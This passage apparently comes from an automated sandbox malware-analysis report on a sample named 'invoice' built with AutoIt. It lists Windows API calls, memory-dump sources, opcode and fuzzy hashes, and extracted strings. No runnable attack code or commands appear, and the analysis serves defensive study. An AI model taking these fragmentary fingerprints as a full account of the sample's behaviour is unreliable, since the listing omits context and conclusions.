                        • Instruction Fuzzy Hash: 97D05E3226090EABEF11CEA4DC01EAF3B69EB04B01F408111FE15C5090C776D835AF60
                        APIs
                        • GetUserNameW.ADVAPI32(?,?), ref: 00FC2171
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: NameUser
                        • String ID:
                        • API String ID: 2645101109-0
                        • Opcode ID: eb883db5c9132404f2134f76db4975176c8c7fc340ac8cb8086e3562b44bc098
                        • Instruction ID: 1784eac8b3bcbcf22f910b35b12498d84b4f9e852414e0dd0b7b2681d10d0d8a
                        • Opcode Fuzzy Hash: eb883db5c9132404f2134f76db4975176c8c7fc340ac8cb8086e3562b44bc098
                        • Instruction Fuzzy Hash: BCC04CF180510EDBDB15EB90D688EEE77BCFB04304F104055A141F2100D7789B449B71
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00FAA2AA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 29b366e9a2baf8db97771b80f0dfee44381b0d12c8223fb105980d763c575f73
                        • Instruction ID: 4fc1d08d65833745488d82020a48d1e715a3b5c71e5db6a99c1634bf9c5daa6f
                        • Opcode Fuzzy Hash: 29b366e9a2baf8db97771b80f0dfee44381b0d12c8223fb105980d763c575f73
                        • Instruction Fuzzy Hash: 75A0123000410DA78A111B41E8044447F5CD6001A0B008010F40C4001187B354105680
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cf08f21a562bf8504b1dd68b9ce173ec1538e7b07f0f95f227130eaf2e5ac07d
                        • Instruction ID: a01ae472b0fb4b5cd05aab154ead42eedcff62bb70bb54af0689f7ef9b36d313
                        • Opcode Fuzzy Hash: cf08f21a562bf8504b1dd68b9ce173ec1538e7b07f0f95f227130eaf2e5ac07d
                        • Instruction Fuzzy Hash: 64222371D001568BEF389E19C49477CB7A2FB867A4F2C802BD8528B6A1DB34DD82F741
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                        • Instruction ID: c3978986eb9a1508248085f0019e13f6d7996ac50a2adfe3670cf3908f5ed4c6
                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                        • Instruction Fuzzy Hash: 15C185B2A151A30DDF6D863D843413EBEA16AA37B271A075DE8B3CB5D5FF10C524E620
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                        • Instruction ID: 2329711a8ce256f80bacb32cf343def0d433916ae0d466bc1fa41090b58c5068
                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                        • Instruction Fuzzy Hash: 93C173B2A151A30ADF6D463D843413EBFA16AA37B271A076DE4B2DB5C4FF14C524F620
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                        • Instruction ID: cd41e5a8fc8c26c6908b750a88382e034a3c318ad4af8da65b7124bf63d058bc
                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                        • Instruction Fuzzy Hash: EAC170B2A051A30DDB2D4639C47417EBEA17AA37B271B076DE4B3CB5C4FF20D564A620
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719820104.000000000152B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0152B000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_152b000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                        • Instruction ID: 3f2994733cc451bfd8c414f0bd9cc54a1ca520b53352ae63f55fc89b6174b3a7
                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                        • Instruction Fuzzy Hash: 1941C171D1051CEBCF48CFADC991AAEBBF2EF88201F548299D516AB345D730AB41DB80
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719820104.000000000152B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0152B000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_152b000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                        • Instruction ID: 399552698f791a18522fc6639a674e16a827c952f570dd565e555e31bb1d7c7b
                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                        • Instruction Fuzzy Hash: 25018079A00109EFCB44DF98C5919AEF7B5FB49210F20869AD809AB341D730AE41DB90
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719820104.000000000152B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0152B000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_152b000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                        • Instruction ID: 8e436f1119dba3037df6d5ca41a362c38eeff5fb42ad501e139ac5a8d826979b
                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                        • Instruction Fuzzy Hash: 03019279A00209EFCB44DF98C5919AEF7F5FB89310F20859AD819AB341D730AE41DB80
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719820104.000000000152B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0152B000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_152b000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                        APIs
                        • DeleteObject.GDI32(00000000), ref: 00FF7970
                        • DeleteObject.GDI32(00000000), ref: 00FF7982
                        • DestroyWindow.USER32 ref: 00FF7990
                        • GetDesktopWindow.USER32 ref: 00FF79AA
                        • GetWindowRect.USER32(00000000), ref: 00FF79B1
                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00FF7AF2
                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00FF7B02
                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7B4A
                        • GetClientRect.USER32(00000000,?), ref: 00FF7B56
                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00FF7B90
                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7BB2
                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7BC5
                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7BD0
                        • GlobalLock.KERNEL32(00000000), ref: 00FF7BD9
                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7BE8
                        • GlobalUnlock.KERNEL32(00000000), ref: 00FF7BF1
                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7BF8
                        • GlobalFree.KERNEL32(00000000), ref: 00FF7C03
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7C15
                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,01012CAC,00000000), ref: 00FF7C2B
                        • GlobalFree.KERNEL32(00000000), ref: 00FF7C3B
                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00FF7C61
                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00FF7C80
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7CA2
                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00FF7E8F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                        • String ID: $AutoIt v3$DISPLAY$static
                        • API String ID: 2211948467-2373415609
                        • Opcode ID: 49c184246d5e4ecdae46486b7d9e761fc753bbd81b85b6d82f10205975c260f1
                        • Instruction ID: 0a11fb0823cf2fead78ebe56d914e2f138b01384f1590502c779be5cd81c50ba
                        • Opcode Fuzzy Hash: 49c184246d5e4ecdae46486b7d9e761fc753bbd81b85b6d82f10205975c260f1
                        • Instruction Fuzzy Hash: 12029271900209AFDB25EF64CD89EBEBBB9FF49310F044159F945AB2A0CB799D01DB60
                        APIs
                        • CharUpperBuffW.USER32(?,?,0100F910), ref: 01003690
                        • IsWindowVisible.USER32(?), ref: 010036B4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: BuffCharUpperVisibleWindow
                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                        • API String ID: 4105515805-45149045
                        • Opcode ID: 5fa61142ec47de4b4d897023dd03059e9394f4cbed0ad2572f7bc2f7491dee1b
                        • Instruction ID: 7fd510df835db31c4179c8d3588332fbb2abb9e64f9197b81f8a3296bcee7f76
                        • Opcode Fuzzy Hash: 5fa61142ec47de4b4d897023dd03059e9394f4cbed0ad2572f7bc2f7491dee1b
                        • Instruction Fuzzy Hash: 77D19E702087018FEA16EF14C891A6E7BA6BF95354F084458F8C65F3E2CF75E94ADB41
                        APIs
                        • SetTextColor.GDI32(?,00000000), ref: 0100A662
                        • GetSysColorBrush.USER32(0000000F), ref: 0100A693
                        • GetSysColor.USER32(0000000F), ref: 0100A69F
                        • SetBkColor.GDI32(?,000000FF), ref: 0100A6B9
                        • SelectObject.GDI32(?,00000000), ref: 0100A6C8
                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0100A6F3
                        • GetSysColor.USER32(00000010), ref: 0100A6FB
                        • CreateSolidBrush.GDI32(00000000), ref: 0100A702
                        • FrameRect.USER32(?,?,00000000), ref: 0100A711
                        • DeleteObject.GDI32(00000000), ref: 0100A718
                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0100A763
                        • FillRect.USER32(?,?,00000000), ref: 0100A795
                        • GetWindowLongW.USER32(?,000000F0), ref: 0100A7C0
                          • Part of subcall function 0100A8FC: GetSysColor.USER32(00000012), ref: 0100A935
                          • Part of subcall function 0100A8FC: SetTextColor.GDI32(?,?), ref: 0100A939
                          • Part of subcall function 0100A8FC: GetSysColorBrush.USER32(0000000F), ref: 0100A94F
                          • Part of subcall function 0100A8FC: GetSysColor.USER32(0000000F), ref: 0100A95A
                          • Part of subcall function 0100A8FC: GetSysColor.USER32(00000011), ref: 0100A977
                          • Part of subcall function 0100A8FC: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0100A985
                          • Part of subcall function 0100A8FC: SelectObject.GDI32(?,00000000), ref: 0100A996
                          • Part of subcall function 0100A8FC: SetBkColor.GDI32(?,00000000), ref: 0100A99F
                          • Part of subcall function 0100A8FC: SelectObject.GDI32(?,?), ref: 0100A9AC
                          • Part of subcall function 0100A8FC: InflateRect.USER32(?,000000FF,000000FF), ref: 0100A9CB
                          • Part of subcall function 0100A8FC: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0100A9E2
                          • Part of subcall function 0100A8FC: GetWindowLongW.USER32(00000000,000000F0), ref: 0100A9F7
                          • Part of subcall function 0100A8FC: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0100AA1F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                        • String ID:
                        • API String ID: 3521893082-0
                        • Opcode ID: d10dba0c8a55529fa38d49167a7cea2cc4150ae1fcc972e08849e87baba3eb24
                        • Instruction ID: 928f89eb8f7e2e88691b92ac201e14b61e3c834a5739e3b335ef18dade3dae7a
                        • Opcode Fuzzy Hash: d10dba0c8a55529fa38d49167a7cea2cc4150ae1fcc972e08849e87baba3eb24
                        • Instruction Fuzzy Hash: DF917C72108302EFE7629F64DC08A5B7BE9FF89321F104B19FAA6961D0C736D944DB51
                        APIs
                        • DestroyWindow.USER32(?,?,?), ref: 00F82CA2
                        • DeleteObject.GDI32(00000000), ref: 00F82CE8
                        • DeleteObject.GDI32(00000000), ref: 00F82CF3
                        • DestroyIcon.USER32(00000000,?,?,?), ref: 00F82CFE
                        • DestroyWindow.USER32(00000000,?,?,?), ref: 00F82D09
                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 00FBC5BB
                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00FBC5F4
                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00FBCA1D
                          • Part of subcall function 00F81B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F82036,?,00000000,?,?,?,?,00F816CB,00000000,?), ref: 00F81B9A
                        • SendMessageW.USER32(?,00001053), ref: 00FBCA5A
                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00FBCA71
                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FBCA87
                        • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FBCA92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                        • String ID: 0
                        • API String ID: 464785882-4108050209
                        • Opcode ID: 76ca16cde0511eb3c9fc355c4fc49ce9b193a92ee18cb00cdfc52694474b89e1
                        • Instruction ID: 942b2ef6502d9a00ba28ef48afc9dfabaa9f37ed99d3584a21c148f46261294c
                        • Opcode Fuzzy Hash: 76ca16cde0511eb3c9fc355c4fc49ce9b193a92ee18cb00cdfc52694474b89e1
                        • Instruction Fuzzy Hash: 94129C31A00201EFDB21DF25C885BEABBE5BF05321F544569E58ADB252CB35E842EF91
                        APIs
                        • DestroyWindow.USER32(00000000), ref: 00FF75F3
                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00FF76B2
                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00FF76F0
                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00FF7702
                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00FF7748
                        • GetClientRect.USER32(00000000,?), ref: 00FF7754
                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00FF7798
                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00FF77A7
                        • GetStockObject.GDI32(00000011), ref: 00FF77B7
                        • SelectObject.GDI32(00000000,00000000), ref: 00FF77BB
                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00FF77CB
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FF77D4
                        • DeleteDC.GDI32(00000000), ref: 00FF77DD
                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00FF7809
                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 00FF7820
                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00FF785B
                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00FF786F
                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 00FF7880
                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00FF78B0
                        • GetStockObject.GDI32(00000011), ref: 00FF78BB
                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00FF78C6
                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00FF78D0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                        • API String ID: 2910397461-517079104
                        • Opcode ID: 11bc25ce9896a0d2cc0e0ba7d457b878bdf42fdd44a6b757ff6cbf5cdc91cf24
                        • Instruction ID: 265d680b63dc7da8ad10c26ed8d4a12f8affa24d0f25f62fbc42b8d6e05007af
                        • Opcode Fuzzy Hash: 11bc25ce9896a0d2cc0e0ba7d457b878bdf42fdd44a6b757ff6cbf5cdc91cf24
                        • Instruction Fuzzy Hash: ECA171B1A40209BFEB24DBA4DD8AFAEBBA9EF05710F004105FA54E72D0C775AD00DB60
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 00FEADAA
                        • GetDriveTypeW.KERNEL32(?,0100FAC0,?,\\.\,0100F910), ref: 00FEAE87
                        • SetErrorMode.KERNEL32(00000000,0100FAC0,?,\\.\,0100F910), ref: 00FEAFE5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ErrorMode$DriveType
                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                        • API String ID: 2907320926-4222207086
                        • Opcode ID: e10cbeb0538cd30c76edeecd29e7b7701a102496f7036f4d5118aca4ed806a71
                        • Instruction ID: ec526cf254ee0914b4172662d6435d77eeb9402b7980422bc039cc1588ae6694
                        • Opcode Fuzzy Hash: e10cbeb0538cd30c76edeecd29e7b7701a102496f7036f4d5118aca4ed806a71
                        • Instruction Fuzzy Hash: 1B51C7B56486C59BCB14EF13CD82ABDB374AB84710724819AF942AB251C775FD02FB83
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: __wcsnicmp
                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                        • API String ID: 1038674560-86951937
                        • Opcode ID: f3843d23b6ec853a6f3c6a433ef0a808b0aa0da2371543eacd159a88cfbc3fa0
                        • Instruction ID: ba6f4b13cff9064a35ec69e0b8ef7368c5ef1c1fea0e17cdd89395d001962566
                        • Opcode Fuzzy Hash: f3843d23b6ec853a6f3c6a433ef0a808b0aa0da2371543eacd159a88cfbc3fa0
                        • Instruction Fuzzy Hash: 888126B1A00305ABCB25BB62CC82FEB3769AF15B10F144025F945EA192EB68DE51F791
                        APIs
